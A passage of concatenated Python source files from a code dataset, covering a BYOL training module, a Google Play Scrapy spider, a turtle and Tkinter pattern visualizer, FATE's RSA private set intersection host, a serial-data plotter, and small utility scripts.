parser.add_argument(\"--output_dim\", type=int, default=256)\n parser.add_argument(\"--proj_hidden_dim\", type=int, default=2048)\n\n # predictor\n parser.add_argument(\"--pred_hidden_dim\", type=int, default=512)\n\n return parent_parser\n\n @property\n def learnable_params(self) -> List[dict]:\n \"\"\"Adds projector and predictor parameters to the parent's learnable parameters.\n\n Returns:\n List[dict]: list of learnable parameters.\n \"\"\"\n\n extra_learnable_params = [\n {\"params\": self.projector.parameters()},\n {\"params\": self.predictor.parameters()},\n ]\n return super().learnable_params + extra_learnable_params\n\n @property\n def momentum_pairs(self) -> List[Tuple[Any, Any]]:\n \"\"\"Adds (projector, momentum_projector) to the parent's momentum pairs.\n\n Returns:\n List[Tuple[Any, Any]]: list of momentum pairs.\n \"\"\"\n\n extra_momentum_pairs = [(self.projector, self.momentum_projector)]\n return super().momentum_pairs + extra_momentum_pairs\n\n def forward(self, X: torch.Tensor, *args, **kwargs) -> Dict[str, Any]:\n \"\"\"Performs forward pass of the online encoder (encoder, projector and predictor).\n\n Args:\n X (torch.Tensor): batch of images in tensor format.\n\n Returns:\n Dict[str, Any]: a dict containing the outputs of the parent and the logits of the head.\n \"\"\"\n\n out = super().forward(X, *args, **kwargs)\n z = self.projector(out[\"feats\"])\n p = self.predictor(z)\n return {**out, \"z\": z, \"p\": p}\n\n def training_step(self, batch: Sequence[Any], batch_idx: int) -> torch.Tensor:\n \"\"\"Training step for BYOL reusing BaseModel training step.\n\n Args:\n batch (Sequence[Any]): a batch of data in the format of [img_indexes, [X], Y], where\n [X] is a list of size self.num_crops containing batches of images.\n batch_idx (int): index of the batch.\n\n Returns:\n torch.Tensor: total loss composed of BYOL and classification loss.\n \"\"\"\n\n out = super().training_step(batch, batch_idx)\n class_loss = out[\"loss\"]\n feats1, feats2 = out[\"feats\"]\n momentum_feats1, momentum_feats2 = out[\"momentum_feats\"]\n\n z1 = self.projector(feats1)\n z2 = self.projector(feats2)\n p1 = self.predictor(z1)\n p2 = self.predictor(z2)\n\n # forward momentum encoder\n with torch.no_grad():\n z1_momentum = self.momentum_projector(momentum_feats1)\n z2_momentum = self.momentum_projector(momentum_feats2)\n\n # ------- contrastive loss -------\n neg_cos_sim = byol_loss_func(p1, z2_momentum) + byol_loss_func(p2, z1_momentum)\n\n # calculate std of features\n z1_std = F.normalize(z1, dim=-1).std(dim=0).mean()\n z2_std = F.normalize(z2, dim=-1).std(dim=0).mean()\n z_std = (z1_std + z2_std) / 2\n\n metrics = {\n \"train_neg_cos_sim\": neg_cos_sim,\n \"train_z_std\": z_std,\n }\n self.log_dict(metrics, on_epoch=True, sync_dist=True)\n\n return neg_cos_sim + class_loss\n\n def validation_step(\n self, batch: List[torch.Tensor], batch_idx: int\n ) -> Tuple[Dict[str, Any], Dict[str, Any]]:\n \"\"\"Validation step for pytorch lightning. It performs all the shared operations for the\n momentum encoder and classifier, such as forwarding a batch of images in the momentum\n encoder and classifier and computing statistics.\n\n Args:\n batch (List[torch.Tensor]): a batch of data in the format of [X, Y].\n batch_idx (int): index of the batch.\n\n Returns:\n Tuple(Dict[str, Any], Dict[str, Any]): tuple of dicts containing the batch_size (used\n for averaging), the classification loss and accuracies for both the online and the\n momentum classifiers.\n \"\"\"\n batch2 = copy(batch)\n batch[0] = batch[0][0]\n batch2[0] = batch2[0][1]\n\n \n parent_metrics, metrics = super().validation_step(batch, batch_idx)\n parent_metrics2, metrics2 = super().validation_step(batch2, batch_idx)\n feats1 = parent_metrics['feats']\n feats2 = parent_metrics2['feats']\n\n # momentum_outs = [self._shared_step_momentum(b[0], b[1]) for b in [batch, batch2]]\n # momentum_feats1, momentum_feats2 = momentum_outs[0]['feats'], momentum_outs[1]['feats']\n\n with torch.no_grad():\n z1 = self.projector(feats1)\n z2 = self.projector(feats2)\n p1 = self.predictor(z1)\n p2 = self.predictor(z2)\n\n # # forward momentum encoder\n # z1_momentum = self.momentum_projector(momentum_feats1)\n # z2_momentum = self.momentum_projector(momentum_feats2)\n\n X, targets = batch\n batch_size = targets.size(0)\n\n metrics_utils.align_loss(p1, p2)\n latent_metrics = {\n \"our_alignment\": metrics_utils.align_loss(p1, p2),\n \"our_normalized_alignment\": metrics_utils.align_loss(p1, p2, normalized=True),\n \"our_cosine_distance\": metrics_utils.cos_dist_loss(p1, p2),\n \"our_uniformity\": metrics_utils.uniform_loss(p1),\n \"our_normalized_uniformity\": metrics_utils.uniform_loss(p1, normalized=True)\n }\n if metrics is not None:\n metrics = {**metrics, **latent_metrics}\n else:\n metrics = latent_metrics\n\n metrics[\"batch_size\"] = batch_size\n\n out = self._shared_step_momentum(X, targets)\n # out = momentum_outs[0]\n\n if self.momentum_classifier is not None:\n metrics = {\n \"momentum_val_loss\": out[\"loss\"],\n \"momentum_val_acc1\": out[\"acc1\"],\n \"momentum_val_acc5\": out[\"acc5\"],\n }\n\n return parent_metrics, metrics\n\n def validation_epoch_end(self, outs: Tuple[List[Dict[str, Any]]]):\n \"\"\"Averages the losses and accuracies of the momentum encoder / classifier for all the\n validation batches. This is needed because the last batch can be smaller than the others,\n slightly skewing the metrics.\n\n Args:\n outs (Tuple[List[Dict[str, Any]]]):): list of outputs of the validation step for self\n and the parent.\n \"\"\"\n\n parent_outs = [out[0] for out in outs]\n super().validation_epoch_end(outs)\n # online_predictions = parent_outs['logits']\n # target_projections = parent_outs['target_projections']\n momentum_outs = [out[1] for out in outs]\n log = {\n \"our_alignment\": weighted_mean(momentum_outs, \"our_alignment\", \"batch_size\"),\n \"our_normalized_alignment\": weighted_mean(momentum_outs, \"our_normalized_alignment\", \"batch_size\"),\n \"our_uniformity\": weighted_mean(momentum_outs, \"our_uniformity\", \"batch_size\"),\n \"our_normalized_uniformity\": weighted_mean(momentum_outs, \"our_normalized_uniformity\", \"batch_size\"),\n \"our_cosine_distance\": weighted_mean(momentum_outs, \"our_cosine_distance\", \"batch_size\"),\n }\n\n self.log_dict(log, sync_dist=True)\n\n if self.momentum_classifier is not None:\n\n val_loss = weighted_mean(momentum_outs, \"momentum_val_loss\", \"batch_size\")\n val_acc1 = weighted_mean(momentum_outs, \"momentum_val_acc1\", \"batch_size\")\n val_acc5 = weighted_mean(momentum_outs, \"momentum_val_acc5\", \"batch_size\")\n\n log = {\n \"momentum_val_loss\": val_loss,\n \"momentum_val_acc1\": val_acc1,\n \"momentum_val_acc5\": val_acc5,\n }\n self.log_dict(log, sync_dist=True)\n","sub_path":"solo/methods/byol.py","file_name":"byol.py","file_ext":"py","file_size_in_byte":9863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503411687","text":"#coding=utf8\nfrom google_play_spider.items import GooglePlaySpiderItem\nimport scrapy\n\nclass PttSpider(scrapy.Spider):\n name = \"playspider\" \n start_urls = [\"https://play.google.com/store/apps/collection/topselling_free\",\n \"https://play.google.com/store/apps/collection/topselling_paid\",\n \"https://play.google.com/store/apps/collection/topgrossing\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_free\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_paid\",\n \"https://play.google.com/store/apps/category/GAME/collection/topgrossing\",\n \"https://play.google.com/store/apps/collection/topselling_new_free\",\n \"https://play.google.com/store/apps/collection/topselling_new_paid\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_new_free\",\n \"https://play.google.com/store/apps/category/GAME/collection/topselling_new_paid\"] \n\n def parse(self, response): \n #取得 顯示更多內容 URL\n\n table_title = response.xpath('//div[@class=\"cluster-heading\"]/h2/text()')[0].extract().strip()\n total = 0\n for url in response.xpath('//div[@class=\"card no-rationale square-cover apps small\"]/div[@class=\"card-content id-track-click id-track-impression\"]'):\n total += 1\n\n title = url.xpath('div[@class=\"details\"]/a[@class=\"title\"]/text()')[0].extract()\n imgURL = 'https:' + url.xpath('div[@class=\"cover\"]/div/div/div/img/@data-cover-large')[0].extract()\n description_list = url.xpath('div[@class=\"details\"]/div[@class=\"description\"]/text()')[0].extract()\n description = ''.join(description_list)\n autor = url.xpath('div[@class=\"details\"]/div[@class=\"subtitle-container\"]/a/text()')[0].extract()\n targetURL = 'https://play.google.com' + url.xpath('div[@class=\"details\"]/a/@href')[0].extract()\n autor_URL = 'https://play.google.com' + url.xpath('div[@class=\"details\"]/div[@class=\"subtitle-container\"]/a/@href')[0].extract()\n try:\n star = url.xpath('div[@class=\"reason-set\"]/span/a/div/div/@aria-label')[0].extract()\n except:\n star = 'no star_rate'\n star_rates = star\n\n #使用POST , 抓資料 100 筆\n request = scrapy.FormRequest( \n targetURL,\n formdata = {'start':'0',\n 'num':'1',\n 'numChildren':'0',\n 'cctcss':'square-cover',\n 'cllayout':'NORMAL',\n 'ipf':'1',\n 'xhr':'1',\n 'token':'zNTXc17yBEzmbkMlpt4eKj14YOo:1458833715345'},\n callback = self.parse_data,\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'},\n cookies = {'cookie-key': '_ga=GA1.2.259790884.1552095104; __qca=P0-52365157-1552095104157; __gads=ID=2c4091f81a0034fa:T=1552184369:S=ALNI_MbjxZVq-WfZ8xsrvjXMKBhCeCh_tg; notice-ctt=4%3B1552860610439; _gid=GA1.2.1799586118.1553292208'}\n )\n request.meta['table_title'] = table_title.strip()\n request.meta['title'] = title.strip()\n request.meta['imgURL'] = imgURL.strip()\n request.meta['description'] = description.strip()\n request.meta['autor'] = autor.strip()\n request.meta['autor_URL'] = autor_URL.strip()\n request.meta['star_rates'] = star_rates.strip()\n yield request\n\n if total == 200:\n break\n\n\n def parse_data(self, response): \n #抓取各項資料 使用xpath時,如要抓取一層內的一層,請一層一層往下抓,不要用跳的,不然會抓不到\n playitem = GooglePlaySpiderItem()\n \n playitem['title'] = response.meta['title']\n playitem['imgURL'] = response.meta['imgURL']\n playitem['description'] = response.meta['description']\n playitem['autor'] = response.meta['autor']\n playitem['autor_URL'] = response.meta['autor_URL']\n playitem['star_rates'] = response.meta['star_rates']\n playitem['table_title']= response.meta['table_title']\n\n cat = []\n for label in response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[1]/div/div[2]/div/div[1]/div/div[1]/div[1]/span[@class=\"T32cc UAO9ie\"]'):\n label_name = label.xpath('a/text()')[0].extract()\n if label_name != playitem['autor']:\n cat.append(label_name.strip()[:5000])\n playitem['category'] = \"\".join(cat)\n\n price = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[1]/div/div[2]/div/div[2]/div/div[2]/div[2]/c-wiz/c-wiz/div/span/button')[0].extract()\n details = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[1]/c-wiz[3]/div/div[1]/meta/@content')[0].extract()\n five_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[1]/span[2]/@style')[0].extract()\n four_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[2]/span[2]/@style')[0].extract()\n three_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[3]/span[2]/@style')[0].extract()\n two_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[4]/span[2]/@style')[0].extract()\n one_ratings = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/div/div[1]/c-wiz/div[2]/div[5]/span[2]/@style')[0].extract()\n \n rev = []\n for review in response.xpath('//div[@class=\"zc7KVe\"]/div[@class=\"d15Mdf bAhLNe\"/div[@class=\"UD7Dzf\"]'):\n rev.append(review.xpath('span[1]/text()')[0].extract())\n playitem['reviews'] = \"\".join(rev)\n\n size = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[3]/div[1]/div[2]/div/div[3]/span/div/span/text()')[0].extract()\n installs = response.xpath('//div[@class=\"QKtxw\"]/div[4]/c-wiz/div/div[2]/div/div[1]/div/c-wiz[3]/div[1]/div[2]/div/div[4]/span/div/span/text()')[0].extract()\n\n playitem['price'] = price.strip()[:-4]\n playitem['details'] = details.strip()[:100000]\n playitem['five_ratings'] = five_ratings.strip()[7:]\n playitem['four_ratings'] = four_ratings.strip()[7:]\n playitem['three_ratings'] = three_ratings.strip()[7:]\n playitem['two_ratings'] = two_ratings.strip()[7:]\n playitem['one_ratings'] = one_ratings.strip()[7:]\n playitem['size'] = size.strip()\n playitem['installs'] = installs.strip()[:-1]\n\n yield playitem\n \n\n","sub_path":"detail/google_play_spider/spiders/googleplaySpider.py","file_name":"googleplaySpider.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348360415","text":"#William Ambrozic 2018\nfrom turtle import *\nimport Tkinter as tk\nfrom tkColorChooser import askcolor\nfrom mingus.midi import fluidsynth\nfluidsynth.init('/usr/share/sounds/sf2/FluidR3_GM.sf2',\"alsa\")\n\ndef getDots(Link, view):\n scale = 6 #increses / decreases the size of the patterns to a factor of scale\n t.tracer(0)\n for x in range(numONodes.get()):\n if (rainbow.get() == 0): t.dot(5, nodeColor.get())\n Link[x] = t.position()\n t.forward(scale * 360.0/numONodes.get()) #I want all of the shapes to be to same relative size\n t.left(360.0/numONodes.get()) #After simpliying (n-2) * 180 given that I need to find the complimentary angle\n return Link\n\ndef createPoly(view):\n colors = [\"#660000\", \"#990000\", \"#CC0000\", \"#FF0000\", \"#CC3333\", \"#FF6666\", \"#FF9999\", \"#FFCCCC\", \"#663300\", \"#993300\",\n \"#CC3300\", \"#FF3300\", \"#FF6600\", \"#FF6633\", \"#FF9966\", \"#FFCC99\", \"#996633\", \"#CC9900\", \"#FFCC00\", \"#FFFF00\",\n \"#FFFF33\", \"#FFFF66\", \"#FFFF99\", \"#FFFFCC\", \"#003300\", \"#006600\", \"#009900\", \"#00CC00\", \"#00FF00\", \"#66FF66\",\n \"#CCFFCC\", \"#003333\", \"#336666\", \"#009999\", \"#00CCCC\", \"#66CCCC\", \"#66FFCC\", \"#99FFCC\", \"#003399\", \"#0033FF\",\n \"#0066FF\", \"#00CCFF\", \"#00FFFF\", \"#99FFFF\", \"#CCFFFF\", \"#000066\", \"#000099\", \"#0000CC\", \"#0000FF\", \"#3366FF\",\n \"#3399FF\", \"#66CCFF\", \"#99CCFF\", \"#330066\", \"#660099\", \"#663399\", \"#9900CC\", \"#9933FF\", \"#9966FF\", \"#9999FF\",\n \"#CCCCFF\", \"#660066\", \"#990066\", \"#CC0099\", \"#FF0099\", \"#FF00FF\", \"#FF66FF\", \"#FF99FF\", \"#FFCCFF\"]\n Link = [0] * int(numONodes.get()) #Creating list to connect nodes, rounds any floats\n t.color(lineColor.get())\n t.speed(0)\n t.penup()\n Link = getDots(Link, view)\n if view:\n t.tracer(0)\n else:\n t.tracer(1)\n for x in range(numONodes.get()):\n if rainbow.get() == 1: t.color(colors[x % 69])\n t.penup()\n t.goto(Link[x])\n t.pendown()\n value = int(x * float(degree.get()))\n fluidsynth.play_Note(value % 100,100)\n if (value >= numONodes.get()):\n t.goto(Link[value % numONodes.get()])\n else:\n t.goto(Link[value])\n if (rainbow.get() == 0): t.dot(5, hitNodeColor.get())# before it goes back change the color of the targeted node\n t.goto(Link[x])\n t.penup()\n t.goto(Link[0]) #The pen needs to go back to the start so the next pattern can be drawn\n done()\n\ndef changeLineColor():\n color = askcolor()[1]\n lineColor.set(color)\n canvas.itemconfig(Line, fill = color)\n\ndef changeBackColor():\n t.screen.bgcolor(askcolor()[1])\n\ndef changeNodeColor():\n nodeColor.set(askcolor()[1])\n\ndef changeHitNodeColor():\n hitNodeColor.set(askcolor()[1])\n\nroot = tk.Tk()\nroot.title('Mulitplication Visualizer')\ncanvas = tk.Canvas(master = root, width = 800, height = 800)\n#root.resizable(False, False)\ncanvas.pack()\nfluidsynth.init(\"soundfont.SF2\")\n\nt = RawTurtle(canvas)\nt.ht() #Hides curser\nt.screen.bgcolor('black')\nt.penup()\nt.sety(-330)\nt.pensize(1)\n\nnumONodes = tk.IntVar()\ne2 = tk.Scale(master = root, from_=50, to=1000, variable=numONodes, length=700, orient=tk.HORIZONTAL).pack(side = tk.BOTTOM)\nnumONodes.set(360)\n\ndegree = tk.StringVar()\ndegree.set(\"101\")\ne2 = tk.Entry(master = root, textvariable=degree).pack(side = tk.TOP)\n\nlineColor = tk.StringVar()\nlineColor.set(\"red\")\nnodeColor = tk.StringVar()\nnodeColor.set(\"red\")\nhitNodeColor = tk.StringVar()\nhitNodeColor.set(\"red\")\n\nrainbow = tk.IntVar()\nrainbow.set(0)\nRainbow = tk.Checkbutton(master = root, text=\"Rainbow\", variable=rainbow).pack(side = tk.LEFT)\n\nView = tk.Button(master = root, text = \"View\", command = lambda: createPoly(True)).pack(side = tk.RIGHT)\nDraw = tk.Button(master = root, text = \"Draw\", command = lambda: createPoly(False)).pack(side = tk.RIGHT)\nClear = tk.Button(master = root, text = \"Clear\", command = t.clear).pack(side = tk.RIGHT)\nBackColor = tk.Button(master = root, text = \"Background Color\", command = changeBackColor).pack(side = tk.RIGHT)\nLineColor = tk.Button(master = root, text = \"Line Color\", command = changeLineColor).pack(side = tk.RIGHT)\nNodeColor = tk.Button(master = root, text = \"Node Color\", command = changeNodeColor).pack(side = tk.RIGHT)\nHitNodeColor = tk.Button(master = root, text = \"Hit Node Color\", command = changeHitNodeColor).pack(side = tk.RIGHT)\n\nroot.mainloop()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460736073","text":"#\r\n# Copyright 2019 The FATE Authors. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n#\r\n\r\nimport hashlib\r\nfrom arch.api.federation import remote, get\r\nfrom arch.api.utils import log_utils\r\nfrom federatedml.secureprotol import gmpy_math\r\nfrom federatedml.secureprotol.encrypt import RsaEncrypt\r\nfrom federatedml.statistic.intersect import RawIntersect\r\nfrom federatedml.statistic.intersect import RsaIntersect\r\nfrom federatedml.util import consts\r\nfrom federatedml.util.transfer_variable import RsaIntersectTransferVariable\r\n\r\nLOGGER = log_utils.getLogger()\r\n\r\n\r\nclass RsaIntersectionHost(RsaIntersect):\r\n def __init__(self, intersect_params):\r\n super().__init__(intersect_params)\r\n\r\n self.get_intersect_ids_flag = intersect_params.is_get_intersect_ids\r\n self.transfer_variable = RsaIntersectTransferVariable()\r\n\r\n self.e = None\r\n self.d = None\r\n self.n = None\r\n\r\n @staticmethod\r\n def hash(value):\r\n return hashlib.sha256(bytes(str(value), encoding='utf-8')).hexdigest()\r\n\r\n def run(self, data_instances):\r\n LOGGER.info(\"Start rsa intersection\")\r\n\r\n encrypt_operator = RsaEncrypt()\r\n encrypt_operator.generate_key(rsa_bit=1024)\r\n self.e, self.d, self.n = encrypt_operator.get_key_pair()\r\n LOGGER.info(\"Generate rsa keys.\")\r\n public_key = {\"e\": self.e, \"n\": self.n}\r\n remote(public_key,\r\n name=self.transfer_variable.rsa_pubkey.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.rsa_pubkey),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote public key to Guest.\")\r\n\r\n # (host_id_process, 1)\r\n host_ids_process_pair = data_instances.map(\r\n lambda k, v: (\r\n RsaIntersectionHost.hash(gmpy_math.powmod(int(RsaIntersectionHost.hash(k), 16), self.d, self.n)), k)\r\n )\r\n\r\n host_ids_process = host_ids_process_pair.mapValues(lambda v: 1)\r\n remote(host_ids_process,\r\n name=self.transfer_variable.intersect_host_ids_process.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_host_ids_process),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote host_ids_process to Guest.\")\r\n\r\n # Recv guest ids\r\n guest_ids = get(name=self.transfer_variable.intersect_guest_ids.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_guest_ids),\r\n idx=0)\r\n LOGGER.info(\"Get guest_ids from guest\")\r\n\r\n # Process guest ids and return to guest\r\n guest_ids_process = guest_ids.map(lambda k, v: (k, gmpy_math.powmod(int(k), self.d, self.n)))\r\n remote(guest_ids_process,\r\n name=self.transfer_variable.intersect_guest_ids_process.name,\r\n tag=self.transfer_variable.generate_transferid(self.transfer_variable.intersect_guest_ids_process),\r\n role=consts.GUEST,\r\n idx=0)\r\n LOGGER.info(\"Remote guest_ids_process to Guest.\")\r\n\r\n # recv intersect ids\r\n intersect_ids = None\r\n if self.get_intersect_ids_flag:\r\n encrypt_intersect_ids = get(name=self.transfer_variable.intersect_ids.name,\r\n tag=self.transfer_variable.generate_transferid(\r\n self.transfer_variable.intersect_ids),\r\n idx=0)\r\n\r\n intersect_ids_pair = encrypt_intersect_ids.join(host_ids_process_pair, lambda e, h: h)\r\n intersect_ids = intersect_ids_pair.map(lambda k, v: (v, \"intersect_id\"))\r\n LOGGER.info(\"Get intersect ids from Guest\")\r\n\r\n if not self.only_output_key:\r\n intersect_ids = self._get_value_from_data(intersect_ids, data_instances)\r\n\r\n return intersect_ids\r\n\r\n\r\nclass RawIntersectionHost(RawIntersect):\r\n def __init__(self, intersect_params):\r\n super().__init__(intersect_params)\r\n self.join_role = intersect_params.join_role\r\n self.role = consts.HOST\r\n\r\n def run(self, data_instances):\r\n LOGGER.info(\"Start raw intersection\")\r\n\r\n if self.join_role == consts.GUEST:\r\n intersect_ids = self.intersect_send_id(data_instances)\r\n elif self.join_role == consts.HOST:\r\n intersect_ids = self.intersect_join_id(data_instances)\r\n else:\r\n raise ValueError(\"Unknown intersect join role, please check the configure of host\")\r\n\r\n return intersect_ids\r\n","sub_path":"federatedml/statistic/intersect/intersect_host.py","file_name":"intersect_host.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"484174525","text":"# coding:utf-8\r\n\r\nimport time\r\nimport threading\r\n\r\nimport MySerial_robot\r\nimport MyParse\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\n\r\n\r\ndef allow(spaces):\r\n a = str(spaces) + \"----->>\"\r\n b = \" \" * spaces\r\n print(b + a)\r\n\r\n\r\nclass Pararell:\r\n\r\n def __init__(self): # {{{\r\n self.X = 0.0\r\n self.Y = 0.0\r\n self.Vx = 0.0\r\n self.Vy = 0.0\r\n self.Theata = 0.0\r\n\r\n self.thread1 = threading.Thread(target=self.target1)\r\n self.thread1.start()\r\n\r\n self.thread2 = threading.Thread(target=self.target2)\r\n self.thread2.start()\r\n\r\n# }}}\r\n\r\n def target1(self): # {{{\r\n ser = MySerial_robot.MySerial()\r\n\r\n ser.getPortInfo_Auto()\r\n ser.openPort()\r\n\r\n cnt = 0\r\n while(True):\r\n line = MyParse.MyParse(ser.getSerial())\r\n line.refine()\r\n\r\n if(line.getLabel() == \"@gX_acc\"):\r\n # self.Vx = line.getValue()\r\n print(\"gX_acc\", self.Vx, \"\\n\")\r\n\r\n # elif(line.getLabel() == \"@gY_acc\"):\r\n # self.Vy = line.getValue()\r\n # print(\"gY_acc\", self.Vy, \"\\n\")\r\n #\r\n # elif(line.getLabel() == \"@X\"):\r\n # self.X = line.getValue()\r\n # print(\"X\", self.Vy, \"\\n\")\r\n #\r\n # elif(line.getLabel() == \"@Y\"):\r\n # self.Y = line.getValue()\r\n # print(\"Y\", self.Y, \"\\n\")\r\n #\r\n elif(line.getLabel() == \"@gAngle\"):\r\n temp = line.getValue()\r\n if(temp < 0):\r\n print(\"<><><><><><><><><><><><><><><><><><><>\\n\\n\")\r\n self.Theata = 180 - temp\r\n self.Theata = temp\r\n print(\"gAngle\", self.Theata, \"\\n\")\r\n\r\n # allow(cnt % 50)\r\n cnt += 1\r\n\r\n ser.closePort()\r\n\r\n# }}}\r\n\r\n def target2(self):\r\n time.sleep(2)\r\n print(\"-------------------------------------------------------\")\r\n\r\n # memBuff affects array size and finess\r\n # speed affects plotting followability\r\n memBuff = 10\r\n speed = 0.0005\r\n # speed = 0.05\r\n\r\n fig = plt.figure(figsize=(16, 10), facecolor=\"w\", edgecolor=\"w\")\r\n gs = gridspec.GridSpec(2, 2)\r\n\r\n # for liner_plot\r\n ax1 = fig.add_subplot(gs[0, :])\r\n\r\n # for scatter_plot\r\n ax2 = fig.add_subplot(gs[1, 0])\r\n\r\n # for polar_plot\r\n ax3 = fig.add_subplot(gs[1, 1], projection='polar')\r\n\r\n # initialize data_arrays\r\n t = np.arange(0, 1, 1 / memBuff)\r\n Vx = np.arange(0, 1, 1 / memBuff)\r\n Vy = np.arange(0, 1, 1 / memBuff)\r\n X = np.arange(0, 1, 1 / memBuff)\r\n Y = np.arange(0, 1, 1 / memBuff)\r\n r = np.ones(memBuff)\r\n theata = 2 * np.pi * r\r\n\r\n # for liner_plot\r\n lines1_1, = ax1.plot(t, Vx, label=\"Vx\")\r\n lines1_2, = ax1.plot(t, Vy, label=\"Vy\")\r\n # for scatter_plot\r\n lines2, = ax2.plot(X, Y, color=\"c\",\r\n marker=r'o', markersize=20, alpha=0.3)\r\n\r\n # for polar_plot\r\n lines3, = ax3.plot(theata, r, color=\"g\", alpha=0.3,\r\n markersize=15, marker=\"o\", linewidth=1)\r\n\r\n # plt.grid()\r\n plt.tight_layout()\r\n\r\n # ##################################################################\r\n\r\n print(\"---------------------------------------------------\")\r\n\r\n while True:\r\n\r\n # for liner_plot\r\n lines1_1.set_data(t, [Vx[i] for i in range(memBuff)])\r\n lines1_2.set_data(t, [Vy[i] for i in range(memBuff)])\r\n\r\n # for scatter_plot\r\n lines2.set_data([X[i]for i in range(memBuff)],\r\n [Y[i]for i in range(memBuff)])\r\n\r\n # for polar_plot\r\n lines3.set_data([theata[i]for i in range(memBuff)],\r\n [r[i]for i in range(memBuff)])\r\n\r\n # update\r\n t += 0.1\r\n # y軸側のlistサイズがmemBuff以上になったら古い要素から捨てる\r\n if(Vx.size > memBuff):\r\n Vx = Vx[1:]\r\n Vy = Vy[1:]\r\n X = X[1:]\r\n Y = Y[1:]\r\n theata = theata[1:]\r\n r = r[1:]\r\n\r\n # #################################################\r\n Vx = np.append(Vx, self.Vx)\r\n Vy = np.append(Vy, self.Vy)\r\n X = np.append(X, self.X)\r\n Y = np.append(Y, self.Y)\r\n\r\n theata = np.append(theata, self.Theata)\r\n\r\n r = np.append(r, 1.0)\r\n\r\n # #################################################\r\n\r\n # for liner_plot\r\n ax1.set_xlim((t.min() - 0.2, t.max() + 0.2))\r\n ax1.set_ylim((Vx.min() - 0.2, Vx.max() + 0.2))\r\n # ax1.set_ylim(-0.1, 1.1)\r\n\r\n ax1.set_xlabel(\"$Time(s)$\")\r\n ax1.grid(True)\r\n ax1.legend()\r\n\r\n # for scatter_plot\r\n # ax2.set_xlim((X.min() - 0.2, X.max() + 0.2))\r\n # ax2.set_xlim((Y.min() - 0.2, Y.max() + 0.2))\r\n ax2.set_xlim(-0.1, 1.1)\r\n ax2.set_ylim(-0.1, 1.1)\r\n\r\n ax2.set_xlabel(\"$X$\")\r\n ax2.set_ylabel(\"$Y$\")\r\n ax2.grid(True)\r\n\r\n # for polar_plot\r\n ax3.set_rmax(1.5)\r\n ax3.grid(True)\r\n\r\n plt.pause(speed)\r\n\r\n\r\nif(__name__ == \"__main__\"):\r\n hoge = Pararell()\r\n","sub_path":"main_alpha_robot.py","file_name":"main_alpha_robot.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457309984","text":"def title_case(title, minor_words=''):\n title = title.capitalize().split()\n minor_words = minor_words.lower().split()\n return ' '.join([word if word in minor_words else word.capitalize() for\n word in title])\n\nif __name__ == \"__main__\":\n print(title_case('a clash of KINGS', 'a an the of'));\n print(title_case('THE WIND IN THE WILLOWS', 'The In'));\n print(title_case('the quick brown fox', 'The Quick Brown Fox'));\n","sub_path":"title-case.py","file_name":"title-case.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"594719553","text":"from fpdf import FPDF\n\npdf = FPDF()\n\npdf.add_page()\n\npdf.set_font(\"Arial\", size=15)\n\nfd = open(\"bi content.txt\", \"r\")\nfor i in fd:\n pdf.cell(200, 10, txt=i, ln=1, align=\"C\")\n\npdf.output(\"BI.pdf\")\nprint(\"successfully PDF Created:\")\n","sub_path":"PDFfileconverter.py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131652615","text":"from django.http import HttpResponse, Http404\nfrom django.template import 